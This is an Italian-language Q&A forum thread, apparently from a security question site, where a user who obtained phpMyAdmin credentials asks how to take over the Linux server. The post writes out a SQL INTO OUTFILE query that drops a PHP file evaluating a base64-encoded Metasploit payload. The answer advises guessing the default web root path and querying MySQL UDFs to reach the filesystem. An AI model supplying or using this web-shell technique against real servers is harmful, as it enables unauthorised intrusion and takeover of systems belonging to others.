Come hackerare linux da phpMyAdmin? [chiuso]

Naviga le tue risposte
-2

Ho ottenuto il nome utente e la password per phpMyAdmin, e sto cercando di hackerare il sistema operativo "linux". ho provato a creare un file payload.php che è un pyaload preso da metasploit. ho codificato il payload in base64 ed eseguito questa query in phpMyAdmin: 

SELECT "<?php eval(base64_decode('payload encoded in base64')) ?>" INTO OUTFILE "payload.php";

è eseguito con successo, ma non conosco il percorso del file creato e non so come farlo eseguire dal server

    
posta user1028 15.08.2012 - 21:10
fonte

1 risposta

1

Prova "/var/www/html/payload.php" come ipotesi sul percorso predefinito per la root html. Puoi anche esaminare i modi per mappare il file system dalle query SQL.

Se hai accesso alle UDF, potresti avere accesso alle funzioni che accedono al filesystem. Controllare: SELEZIONARE * DA mysql.func

Per informazioni più dettagliate sulle UDF, leggi qui .

    
risposta data 15.08.2012 - 22:21
fonte

Leggi altre domande sui tag

Un hacker può recuperare file cancellati dal mio dispositivo mobile? [duplicare] Bypassare il filtraggio degli indirizzi MAC nella lista nera (che impedisce ad alcuni indirizzi MAC di accedere al router)